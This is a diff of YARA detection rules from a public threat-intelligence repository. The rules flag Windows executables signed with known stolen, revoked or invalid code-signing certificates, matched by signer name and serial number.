 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "REGION TOURISM LLC" and pe.signatures [ i ] . serial == "5b:32:0a:2f:46:c9:9c:1b:a1:35:7b:ee" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Gavrilov Andrei Alekseevich" and ( pe.signatures [ i ] . serial == "bd:b9:9d:5e:cf:82:71:d4:8e:35:f1:03:9c:21:60:ef" or pe.signatures [ i ] . serial == "00:bd:b9:9d:5e:cf:82:71:d4:8e:35:f1:03:9c:21:60:ef" ) )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_02C5351936Abe405Ac760228A40387E8 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_025020668F51235E9Ecfff8Cf00Da63E : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificate"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "32e200c3-678f-5be4-b55b-2a7a32e56843"
+		id = "5b9af281-09b0-5df5-af3b-4868a7243636"
 		date = "2024-10-04"
 		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L458-L469"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7085-L7096"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "ae9e428c5e7c1ab67be291da93e6d3fa694e3a9b347672817cbf1cac44837a04"
+		logic_hash = "c99caf6ada228fe1229ea8e8ca0b160468f044a9a1e13ed9a83c12afeae337a1"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "1174c2affb0a364c1b7a231168cfdda5989c04c5"
+		thumbprint = "59f82837fa672a81841d8fa4d3ba290395c10200"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "RESURS-RM OOO" and pe.signatures [ i ] . serial == "02:c5:35:19:36:ab:e4:05:ac:76:02:28:a4:03:87:e8" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Knassar DK ApS" and pe.signatures [ i ] . serial == "02:50:20:66:8f:51:23:5e:9e:cf:ff:8c:f0:0d:a6:3e" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_08D4352185317271C1Cec9D05C279Af7 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_00Cfae7E6F538B9F2E : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificate"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "a0197037-874c-55e7-80aa-e8b7156a26a3"
+		id = "c144fe64-ad45-5ac6-b2ee-904a66230674"
 		date = "2024-10-04"
 		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L471-L482"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7098-L7112"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "6f4b8a52e152097a6e18f55b6b677eb1ba0f4da78ce68ffa35510bfb485e01e9"
+		logic_hash = "23032d387bbfc81edb08982a196b90a136faf935d74c46771c59ef19095ac3a4"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "52fe4ecd6c925e89068fee38f1b9a669a70f8bab"
+		thumbprint = "3152fc5298e42de08ed2dec23d8fefcaa531c771"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Retalit LLC" and pe.signatures [ i ] . serial == "08:d4:35:21:85:31:72:71:c1:ce:c9:d0:5c:27:9a:f7" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SequenceDesigner" and ( pe.signatures [ i ] . serial == "cf:ae:7e:6f:53:8b:9f:2e" or pe.signatures [ i ] . serial == "00:cf:ae:7e:6f:53:8b:9f:2e" ) )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_0Ed8Ade5D73B73Dade6943D557Ff87E5 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_0Bc9B800F480691Bd6B60963466B0C75 : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificate"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "ebdab290-d388-528e-b392-0ae87941b69d"
+		id = "ff76c8b3-8120-54ed-90e1-3ee01e57895e"
 		date = "2024-10-04"
 		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L484-L495"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7114-L7125"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "e2e269a83a86567bf359996945cddc597406033aa7c5a7acf30b58d30816b28f"
+		logic_hash = "15143a6dc374f22252880ce61a419df46d81bc1ee99a29d03a61348f9c230064"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "9bbd8476bf8b62be738437af628d525895a2c9c9"
+		thumbprint = "8b6c4fc3d54f41ac137795e64477491c93bdf7f1"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Rumikon LLC" and pe.signatures [ i ] . serial == "0e:d8:ad:e5:d7:3b:73:da:de:69:43:d5:57:ff:87:e5" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "HasCred ApS" and pe.signatures [ i ] . serial == "0b:c9:b8:00:f4:80:69:1b:d6:b6:09:63:46:6b:0c:75" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_0Ed1847A2Ae5D71Def1E833Fddd33D38 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_69Ad1E8B5941C93D5017B7C3Fdb8E7B6 : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificate"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "5e09087b-3fd0-5979-8f98-f242231c8b4f"
+		id = "4b961b30-dc0d-513c-8a66-ed8fe71f5439"
 		date = "2024-10-04"
 		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L497-L508"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7127-L7138"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "2acc6d2262bac8bfe49bb244d62be4dcf626dd9b2c9786b7a8963c48b17e6ab9"
+		logic_hash = "1a37133dcc7af9c3f229f517dca847d7c007b8a2fdc6af50721d68f68c5d9c20"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "e611a7d4cd6bb8650e1e670567ac99d0bf24b3e8"
+		thumbprint = "9b6f3b3cd33ae938fbc5c95b8c9239bac9f9f7bf"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SNAB-RESURS, OOO" and pe.signatures [ i ] . serial == "0e:d1:84:7a:2a:e5:d7:1d:ef:1e:83:3f:dd:d3:3d:38" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Afia Wave Enterprises Oy" and pe.signatures [ i ] . serial == "69:ad:1e:8b:59:41:c9:3d:50:17:b7:c3:fd:b8:e7:b6" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_0292C7D574132Ba5C0441D1C7Ffcb805 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_072472F2386F4608A0790Da2Be8A48F7 : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificate"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "0792bf83-c0e9-55f8-b6bd-b05bc575e2b4"
+		id = "79f1e6da-003a-5291-a60c-7693ca2efbeb"
 		date = "2024-10-04"
 		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L510-L521"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7140-L7151"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "8d0a6714ce5bfed90c80dcfffe4f1d61ec25c817cdc48907cbc67bcee52a1d9a"
+		logic_hash = "32b61f42ee9f3109c747e8a159376d03349d8a5061be0c31504e929cb3c3042e"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "d0ae777a34d4f8ce6b06755c007d2d92db2a760c"
+		thumbprint = "e2a79e70b7a16a6fc2af7fbdc3d2cbfd3ef66978"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "TES LOGISTIKA d.o.o." and pe.signatures [ i ] . serial == "02:92:c7:d5:74:13:2b:a5:c0:44:1d:1c:7f:fc:b8:05" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "FOXIT SOFTWARE INC." and pe.signatures [ i ] . serial == "07:24:72:f2:38:6f:46:08:a0:79:0d:a2:be:8a:48:f7" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_028D50Ae0C554B49148E82Db5B1C2699 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_00Ea734E1Dfb6E69Ed2Bc55E513Bf95B5E : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificate"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "35cd05db-c399-5d37-a191-9170b048e263"
+		id = "4e40ce70-d5d1-5719-bb43-40f860510093"
 		date = "2024-10-04"
 		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L523-L534"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7153-L7168"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "7fe907059e83a058705a2884d514938c51fd206b0a175cfb9e8619244c20c62f"
+		logic_hash = "e2d07a2af36608d6eab6db85bcb968e486293239d0cfaeea7de2bb8223e58a29"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "0abdbc13639c704ff325035439ea9d20b08bc48e"
+		thumbprint = "5ca53cc5c6dc47838bbba922ad217a468408a9bd"
+		hash1 = "293a83bfe2839bfa6d40fa52f5088e43b62791c08343c3f4dade4f1118000392"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "VAS CO PTY LTD" and pe.signatures [ i ] . serial == "02:8d:50:ae:0c:55:4b:49:14:8e:82:db:5b:1c:26:99" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Postmarket LLC" and ( pe.signatures [ i ] . serial == "00:ea:73:4e:1d:fb:6e:69:ed:2b:c5:5e:51:3b:f9:5b:5e" or pe.signatures [ i ] . serial == "ea:73:4e:1d:fb:6e:69:ed:2b:c5:5e:51:3b:f9:5b:5e" ) )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_0Ca41D2D9F5E991F49B162D584B0F386 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_0Dfa4F0Cff90319951B019A4681Ebd2A : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificate"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "bd395177-daf6-56b1-822c-e659083e0f53"
+		id = "bbb0be70-de74-5da9-80d2-2ba474b7f472"
 		date = "2024-10-04"
 		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L536-L547"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7170-L7182"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "51f80dfd63b273e62abaa8b60a00525cfdc6b28341466a9f414703382ad088bd"
+		logic_hash = "d89cda38cf6149c004f7d7b307243567768cba73bd49979d7d4f92f902ef4508"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "23250aa8e1b8ae49a64d09644db3a9a65f866957"
+		thumbprint = "b85aacac6afb0bef5b6f1d744cd8c278030e6a3e"
+		hash1 = "4eca4e0d3c06e4889917a473229b368bae02f0135f0ac68e937a72fca431ac8a"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "VB CORPORATE PTY. LTD." and pe.signatures [ i ] . serial == "0c:a4:1d:2d:9f:5e:99:1f:49:b1:62:d5:84:b0:f3:86" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "deepinstruction O" and pe.signatures [ i ] . serial == "0d:fa:4f:0c:ff:90:31:99:51:b0:19:a4:68:1e:bd:2a" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_1389C8373C00B792207Bca20Aa40Aa40 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_4D03Ae6512B85Eab4184Ca7F4Fa2E49C : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificate"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "7f22411b-6e66-5177-8837-12b82b3b916b"
+		id = "a7dc0a07-f295-5aff-9df0-71f27f0fe88c"
 		date = "2024-10-04"
 		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L549-L560"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7184-L7196"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "5c0c9ca9e1179f253f1b2ecd9c8a1a0ed17345eb9830201c7c16050339d7ccbc"
+		logic_hash = "2cbeaf65b0d3340df08baf67134a2fe0b26921f2e35ce541884209e3ecddf233"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "38f65d64ac93f080b229ab83cb72619b0754fa6f"
+		thumbprint = "0215ff94a5c0d97db82e11f87e0dfb4318acac38"
+		hash1 = "18bf017bdd74e8e8f5db5a4dd7ec3409021c7b0d2f125f05d728f3b740132015"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "VITA-DE d.o.o." and pe.signatures [ i ] . serial == "13:89:c8:37:3c:00:b7:92:20:7b:ca:20:aa:40:aa:40" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Lenovo IdeaCentre" and pe.signatures [ i ] . serial == "4d:03:ae:65:12:b8:5e:ab:41:84:ca:7f:4f:a2:e4:9c" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_A596Fd2779E507Aa466D159706Fe4150 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_333705C20B56E57F60B5Eb191Eef0D90 : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificate"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "8cf28e2a-d90f-5bf6-b746-7f46e8f6aa2a"
+		id = "e868c3ff-a701-59bd-9cd6-bf49305fe28a"
 		date = "2024-10-04"
 		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L562-L573"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7198-L7209"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "b88f346175e9084fdba94b9a8cbbf28a5012d28ab43350d927aac099921ab1a3"
+		logic_hash = "f5ca35381842a0ea7c319d8388753347a72fc6df746064e520794aeb4b6724d0"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "104c4183e248d63a6e2ad6766927b070c81afcb6"
+		thumbprint = "44f0f77d8b649579fa6f88ae9fa4b4206b90b120"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ClamAV" and pe.signatures [ i ] . serial == "a5:96:fd:27:79:e5:07:aa:46:6d:15:97:06:fe:41:50" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "TASK Holding ApS" and pe.signatures [ i ] . serial == "33:37:05:c2:0b:56:e5:7f:60:b5:eb:19:1e:ef:0d:90" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_45D76C63929C4620Ab706772F5907F82 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_79906Faf4Fbd75Baa10B322356A07F6D : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificate"
+		description = "Detects NetSupport (client) signed executables"
 		author = "ditekSHen"
-		id = "6ade67b1-cff5-5e5d-917c-f31010e09b82"
+		id = "afca727c-ff08-5e47-9ef4-4cd2af96d294"
 		date = "2024-10-04"
 		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L575-L586"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7211-L7222"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "9854a8812f55f2ae7cddc714b780def3d0511b236685a17ffe202711237c4b7e"
+		logic_hash = "59862f31d0ba0cf56a93a86783ad802ea2e511845ab1d141aa224c0c61b720a7"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "67c4afae16e5e2f98fe26b4597365b3cfed68b58"
+		thumbprint = "f84ec9488bdac5f90db3c474b55e31a8f10a2026"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "NEON CRAYON LIMITED" and pe.signatures [ i ] . serial == "45:d7:6c:63:92:9c:46:20:ab:70:67:72:f5:90:7f:82" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "NetSupport Ltd" and pe.signatures [ i ] . serial == "79:90:6f:af:4f:bd:75:ba:a1:0b:32:23:56:a0:7f:6d" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_5029Daca439511456D9Ed8153703F4Bc : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_030Ba877Daf788A0048D04A85B1F6Eca : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificate"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "1d7f0d61-fbe7-58d1-a9d8-083678e8b9bd"
+		id = "66689847-aa67-5029-9f37-cc410a564633"
 		date = "2024-10-04"
 		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L588-L599"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7224-L7235"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "256b4bebbe4567de9e7d1938dd99f7f9fa13749de2f331aec0bc15f4ab5ab488"
+		logic_hash = "70b5b9011b53b7c9ac9dc286f3512a7a8bec5ec35ade0ee1c4bedd0a128994da"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "9d5ded35ffd34aa78273f0ebd4d6fa1e5337ac2b"
+		thumbprint = "1f10c5676a742548fb430fbc1965b20146b7325a"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "THE GREEN PARTNERSHIP LTD" and pe.signatures [ i ] . serial == "50:29:da:ca:43:95:11:45:6d:9e:d8:15:37:03:f4:bc" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Skylum Software USA, Inc." and pe.signatures [ i ] . serial == "03:0b:a8:77:da:f7:88:a0:04:8d:04:a8:5b:1f:6e:ca" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_1C7D3F6E116554809F49Ce16Ccb62E84 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_00Fe83F58D001327Fbaafd7Bac76Ae6818 : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificate"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "66f4c531-5c0d-5467-a875-eff00a5d00c8"
+		id = "5d41be99-85de-55bc-817b-eea510aff308"
 		date = "2024-10-04"
 		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L601-L612"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7237-L7251"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "f24037e6ac40844095e06ea12cebdf4dd22a35382c728f9586b90e40c57a4188"
+		logic_hash = "8aac715daba042ca4a57cd65b98e6192c87a13e7e0c8ff4a3bc81c43223035ad"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = ""
+		thumbprint = "c130dd74928da75a42e9d32a1d3f2fd860d81566"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "1549 LIMITED" and pe.signatures [ i ] . serial == "1c:7d:3f:6e:11:65:54:80:9f:49:ce:16:cc:b6:2e:84" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "A. Jensen FLY Fishing ApS" and ( pe.signatures [ i ] . serial == "fe:83:f5:8d:00:13:27:fb:aa:fd:7b:ac:76:ae:68:18" or pe.signatures [ i ] . serial == "00:fe:83:f5:8d:00:13:27:fb:aa:fd:7b:ac:76:ae:68:18" ) )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_75522215406335725687Af888Dcdc80C : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_0788260F8541539D97F49Ddaa837B166 : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificate"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "712d41e1-6760-5124-8af2-c57a87816237"
+		id = "fb102e07-92fc-5ed8-a9cf-1cfd53f54281"
 		date = "2024-10-04"
 		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L614-L625"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7253-L7265"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "5166ea726b1be824e5702c411800236d60c44fbfc89a39b1bc103de965249d7d"
+		logic_hash = "48985ac2c450bc4b3c5de635717dcf3a7ecf64109aa4059477ba79606f7fc2a4"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = ""
+		thumbprint = "569511fdc5e8dea454e97b005de1af5272d4bd32"
+		hash1 = "6ad407d5c7e4574c7452a1a27da532ee9a55bb4074e43aa677703923909169e4"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "THEESOLUTIONS LTD" and pe.signatures [ i ] . serial == "75:52:22:15:40:63:35:72:56:87:af:88:8d:cd:c8:0c" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "TechSmith Corporation" and pe.signatures [ i ] . serial == "07:88:26:0f:85:41:53:9d:97:f4:9d:da:a8:37:b1:66" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_768Ddcf9Ed8D16A6Bc77451Ee88Dfd90 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_0Ca5Acafb5Fdca6F8B5D66D1339A5D85 : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificate"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "f7d24c5f-e102-568e-bf44-47ccaad6225c"
+		id = "6f0e9e3a-52fc-5ffd-90b3-743d925388df"
 		date = "2024-10-04"
 		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L627-L638"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7267-L7279"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "ba98f0da84b678262ee98e5c5fec2aaeab9a0c304fd4552dd27e87aa54f79cdf"
+		logic_hash = "2612e58b4e1a6fa65b32fe855b3542882c79345e93ab134933c893e90bb1a75c"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = ""
+		thumbprint = "ab25053a3f739ddd4505cf5d9d33b5cc50f3ab35"
+		hash1 = "a3ab41d9642a5a5aa6aa4fc1e316970e06fa26c6c545dd8ff56f82f41465ec08"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "THEESOLUTIONS LTD" and pe.signatures [ i ] . serial == "76:8d:dc:f9:ed:8d:16:a6:bc:77:45:1e:e8:8d:fd:90" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Valve" and pe.signatures [ i ] . serial == "0c:a5:ac:af:b5:fd:ca:6f:8b:5d:66:d1:33:9a:5d:85" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_59E378994Cf1C0022764896D826E6Bb8 : FILE
